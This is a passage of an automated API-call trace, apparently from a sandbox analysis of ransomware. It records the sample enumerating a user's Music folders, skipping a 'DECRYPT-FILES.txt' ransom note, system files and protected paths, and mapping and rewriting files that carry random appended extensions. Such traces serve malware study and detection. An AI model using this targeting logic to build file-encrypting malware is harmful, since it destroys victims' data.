lpName=0x0) returned 0x268 [0185.865] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.865] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.865] CloseHandle (hObject=0x268) returned 1 [0185.866] CloseHandle (hObject=0x264) returned 1 [0185.866] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.866] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf0aa8e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaf0aa8e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaf0aa8e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0185.866] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0185.866] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f60c9a0, ftCreationTime.dwHighDateTime=0x1d4c5e2, ftLastAccessTime.dwLowDateTime=0x191b5a60, ftLastAccessTime.dwHighDateTime=0x1d4cc50, ftLastWriteTime.dwLowDateTime=0xaf2bfc20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x173cc, dwReserved0=0x0, dwReserved1=0x0, cFileName="x3Cc3WVmpwY_49.wav.XYmv", cAlternateFileName="X3CC3W~1.XYM")) returned 1 [0185.866] lstrcmpiW (lpString1="x3Cc3WVmpwY_49.wav.XYmv", lpString2="DECRYPT-FILES.txt") returned 1 [0185.866] lstrcmpiW (lpString1="x3Cc3WVmpwY_49.wav.XYmv", lpString2="autorun.inf") returned 1 [0185.866] lstrcmpiW (lpString1="x3Cc3WVmpwY_49.wav.XYmv", lpString2="boot.ini") returned 1 [0185.866] lstrcmpiW (lpString1="x3Cc3WVmpwY_49.wav.XYmv", lpString2="desktop.ini") returned 1 [0185.866] lstrcmpiW (lpString1="x3Cc3WVmpwY_49.wav.XYmv", lpString2="ntuser.dat") returned 1 [0185.866] lstrcmpiW (lpString1="x3Cc3WVmpwY_49.wav.XYmv", lpString2="iconcache.db") returned 1 [0185.866] lstrcmpiW (lpString1="x3Cc3WVmpwY_49.wav.XYmv", lpString2="bootsect.bak") returned 1 [0185.866] lstrcmpiW (lpString1="x3Cc3WVmpwY_49.wav.XYmv", lpString2="ntuser.dat.log") returned 1 [0185.866] lstrcmpiW (lpString1="x3Cc3WVmpwY_49.wav.XYmv", lpString2="thumbs.db") returned 1 [0185.866] lstrcmpiW (lpString1="x3Cc3WVmpwY_49.wav.XYmv", lpString2="Bootfont.bin") returned 1 [0185.866] lstrlenW (lpString="x3Cc3WVmpwY_49.wav.XYmv") returned 23 [0185.866] lstrcmpiW (lpString1="XYmv", lpString2="lnk") returned 1 [0185.866] lstrcmpiW (lpString1="XYmv", lpString2="exe") returned 1 [0185.866] lstrcmpiW (lpString1="XYmv", lpString2="sys") returned 1 [0185.866] lstrcmpiW (lpString1="XYmv", lpString2="dll") returned 1 [0185.866] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\") returned 53 [0185.866] lstrlenW (lpString="x3Cc3WVmpwY_49.wav.XYmv") returned 23 [0185.866] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\" [0185.866] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\", lpString2="x3Cc3WVmpwY_49.wav.XYmv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\x3Cc3WVmpwY_49.wav.XYmv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\x3Cc3WVmpwY_49.wav.XYmv" [0185.866] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.867] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\x3Cc3WVmpwY_49.wav.XYmv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\pnwitrglh_4la7ri\\x3cc3wvmpwy_49.wav.xymv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0185.868] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=95180) returned 1 [0185.868] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0185.868] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.869] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.869] CloseHandle (hObject=0x268) returned 1 [0185.869] CloseHandle (hObject=0x264) returned 1 [0185.869] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.869] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6cd99380, ftCreationTime.dwHighDateTime=0x1d4d469, ftLastAccessTime.dwLowDateTime=0x9c89800, ftLastAccessTime.dwHighDateTime=0x1d4d445, ftLastWriteTime.dwLowDateTime=0xaf2bfc20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x1102, dwReserved0=0x0, dwReserved1=0x0, cFileName="X9dYdVjiC9.mp3.XYmv", cAlternateFileName="X9DYDV~1.XYM")) returned 1 [0185.869] lstrcmpiW (lpString1="X9dYdVjiC9.mp3.XYmv", lpString2="DECRYPT-FILES.txt") returned 1 [0185.869] lstrcmpiW (lpString1="X9dYdVjiC9.mp3.XYmv", lpString2="autorun.inf") returned 1 [0185.869] lstrcmpiW (lpString1="X9dYdVjiC9.mp3.XYmv", lpString2="boot.ini") returned 1 [0185.869] lstrcmpiW (lpString1="X9dYdVjiC9.mp3.XYmv", lpString2="desktop.ini") returned 1 [0185.869] lstrcmpiW (lpString1="X9dYdVjiC9.mp3.XYmv", lpString2="ntuser.dat") returned 1 [0185.869] lstrcmpiW (lpString1="X9dYdVjiC9.mp3.XYmv", lpString2="iconcache.db") returned 1 [0185.869] lstrcmpiW (lpString1="X9dYdVjiC9.mp3.XYmv", lpString2="bootsect.bak") returned 1 [0185.869] lstrcmpiW (lpString1="X9dYdVjiC9.mp3.XYmv", lpString2="ntuser.dat.log") returned 1 [0185.869] lstrcmpiW (lpString1="X9dYdVjiC9.mp3.XYmv", lpString2="thumbs.db") returned 1 [0185.869] lstrcmpiW (lpString1="X9dYdVjiC9.mp3.XYmv", lpString2="Bootfont.bin") returned 1 [0185.869] lstrlenW (lpString="X9dYdVjiC9.mp3.XYmv") returned 19 [0185.869] lstrcmpiW (lpString1="XYmv", lpString2="lnk") returned 1 [0185.869] lstrcmpiW (lpString1="XYmv", lpString2="exe") returned 1 [0185.869] lstrcmpiW (lpString1="XYmv", lpString2="sys") returned 1 [0185.870] lstrcmpiW (lpString1="XYmv", lpString2="dll") returned 1 [0185.870] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\") returned 53 [0185.870] lstrlenW (lpString="X9dYdVjiC9.mp3.XYmv") returned 19 [0185.870] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\" [0185.870] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\", lpString2="X9dYdVjiC9.mp3.XYmv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\X9dYdVjiC9.mp3.XYmv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\X9dYdVjiC9.mp3.XYmv" [0185.870] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.870] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\X9dYdVjiC9.mp3.XYmv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\pnwitrglh_4la7ri\\x9dydvjic9.mp3.xymv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0185.870] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=4354) returned 1 [0185.870] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0185.870] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.871] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.871] CloseHandle (hObject=0x268) returned 1 [0185.871] CloseHandle (hObject=0x264) returned 1 [0185.871] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.871] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc0447120, ftCreationTime.dwHighDateTime=0x1d4d2ed, ftLastAccessTime.dwLowDateTime=0xaf332040, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaf332040, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zmVkZ0mtR2bYJ", cAlternateFileName="ZMVKZ0~1")) returned 1 [0185.871] lstrcmpW (lpString1="zmVkZ0mtR2bYJ", lpString2=".") returned 1 [0185.871] lstrcmpW (lpString1="zmVkZ0mtR2bYJ", lpString2="..") returned 1 [0185.872] lstrcatW (in: lpString1="zmVkZ0mtR2bYJ", lpString2="\\" | out: lpString1="zmVkZ0mtR2bYJ\\") returned="zmVkZ0mtR2bYJ\\" [0185.872] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\", lpString2="zmVkZ0mtR2bYJ\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\" [0185.872] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\", lpSrch="\\Program Files") returned 0x0 [0185.872] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\", lpSrch=":\\Windows") returned 0x0 [0185.872] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\", lpSrch="\\Games\\") returned 0x0 [0185.872] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\", lpSrch="\\Tor Browser\\") returned 0x0 [0185.872] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\", lpSrch="\\ProgramData\\") returned 0x0 [0185.872] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0185.872] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0185.872] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0185.872] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\", lpSrch="\\All Users") returned 0x0 [0185.872] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\", lpSrch="\\IETldCache\\") returned 0x0 [0185.872] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\", lpSrch="\\Local Settings\\") returned 0x0 [0185.872] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\", lpSrch="\\AppData\\Local") returned 0x0 [0185.872] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\", lpSrch="AhnLab") returned 0x0 [0185.872] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0185.872] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\") returned 67 [0185.872] lstrlenW (lpString="0a16c9.tmp") returned 10 [0185.872] wsprintfW (in: param_1=0x36fe7f0, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\\\0a16c9.tmp") returned 78 [0185.872] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\pnwitrglh_4la7ri\\zmvkz0mtr2byj\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x264 [0185.874] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\") returned 67 [0185.874] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0185.874] wsprintfW (in: param_1=0x36fe7f0, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\\\DECRYPT-FILES.txt") returned 85 [0185.874] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\pnwitrglh_4la7ri\\zmvkz0mtr2byj\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0185.875] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\") returned 67 [0185.875] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\*" [0185.875] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\*", lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc0447120, ftCreationTime.dwHighDateTime=0x1d4d2ed, ftLastAccessTime.dwLowDateTime=0xf17eed80, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf17eed80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4798f8 [0185.875] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0185.875] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc0447120, ftCreationTime.dwHighDateTime=0x1d4d2ed, ftLastAccessTime.dwLowDateTime=0xf17eed80, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf17eed80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0185.875] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0185.875] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0185.875] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf17eed80, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xf17eed80, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf17eed80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0185.875] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0185.875] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0185.875] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0185.875] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0185.875] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0185.875] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0185.875] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0185.875] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0185.875] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0185.875] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0185.875] lstrlenW (lpString="0a16c9.tmp") returned 10 [0185.875] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0185.875] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0185.875] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0185.875] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0185.875] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\") returned 67 [0185.875] lstrlenW (lpString="0a16c9.tmp") returned 10 [0185.875] lstrcpyW (in: lpString1=0x36fe7e0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\" [0185.875] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\0a16c9.tmp" [0185.875] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.876] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\pnwitrglh_4la7ri\\zmvkz0mtr2byj\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0185.876] CloseHandle (hObject=0x0) returned 0 [0185.876] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.876] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf2bfc20, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaf2bfc20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaf2bfc20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0185.876] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0185.876] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28347f0, ftCreationTime.dwHighDateTime=0x1d4cc13, ftLastAccessTime.dwLowDateTime=0x912969a0, ftLastAccessTime.dwHighDateTime=0x1d4d21a, ftLastWriteTime.dwLowDateTime=0xaf2e5d80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xd08a, dwReserved0=0x0, dwReserved1=0x0, cFileName="LrBZvj2Te9U.wav.3aZDcm", cAlternateFileName="LRBZVJ~1.3AZ")) returned 1 [0185.876] lstrcmpiW (lpString1="LrBZvj2Te9U.wav.3aZDcm", lpString2="DECRYPT-FILES.txt") returned 1 [0185.876] lstrcmpiW (lpString1="LrBZvj2Te9U.wav.3aZDcm", lpString2="autorun.inf") returned 1 [0185.876] lstrcmpiW (lpString1="LrBZvj2Te9U.wav.3aZDcm", lpString2="boot.ini") returned 1 [0185.876] lstrcmpiW (lpString1="LrBZvj2Te9U.wav.3aZDcm", lpString2="desktop.ini") returned 1 [0185.876] lstrcmpiW (lpString1="LrBZvj2Te9U.wav.3aZDcm", lpString2="ntuser.dat") returned -1 [0185.876] lstrcmpiW (lpString1="LrBZvj2Te9U.wav.3aZDcm", lpString2="iconcache.db") returned 1 [0185.876] lstrcmpiW (lpString1="LrBZvj2Te9U.wav.3aZDcm", lpString2="bootsect.bak") returned 1 [0185.876] lstrcmpiW (lpString1="LrBZvj2Te9U.wav.3aZDcm", lpString2="ntuser.dat.log") returned -1 [0185.876] lstrcmpiW (lpString1="LrBZvj2Te9U.wav.3aZDcm", lpString2="thumbs.db") returned -1 [0185.876] lstrcmpiW (lpString1="LrBZvj2Te9U.wav.3aZDcm", lpString2="Bootfont.bin") returned 1 [0185.876] lstrlenW (lpString="LrBZvj2Te9U.wav.3aZDcm") returned 22 [0185.876] lstrcmpiW (lpString1="3aZDcm", lpString2="lnk") returned -1 [0185.876] lstrcmpiW (lpString1="3aZDcm", lpString2="exe") returned -1 [0185.876] lstrcmpiW (lpString1="3aZDcm", lpString2="sys") returned -1 [0185.876] lstrcmpiW (lpString1="3aZDcm", lpString2="dll") returned -1 [0185.876] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\") returned 67 [0185.877] lstrlenW (lpString="LrBZvj2Te9U.wav.3aZDcm") returned 22 [0185.877] lstrcpyW (in: lpString1=0x36fe7e0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\" [0185.877] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\", lpString2="LrBZvj2Te9U.wav.3aZDcm" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\LrBZvj2Te9U.wav.3aZDcm") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\LrBZvj2Te9U.wav.3aZDcm" [0185.877] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.877] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\LrBZvj2Te9U.wav.3aZDcm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\pnwitrglh_4la7ri\\zmvkz0mtr2byj\\lrbzvj2te9u.wav.3azdcm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x26c [0185.877] GetFileSizeEx (in: hFile=0x26c, lpFileSize=0x36fdfa8 | out: lpFileSize=0x36fdfa8*=53386) returned 1 [0185.877] CreateFileMappingW (hFile=0x26c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x270 [0185.877] MapViewOfFile (hFileMappingObject=0x270, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.878] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.878] CloseHandle (hObject=0x270) returned 1 [0185.878] CloseHandle (hObject=0x26c) returned 1 [0185.878] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.878] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7d68370, ftCreationTime.dwHighDateTime=0x1d4c75c, 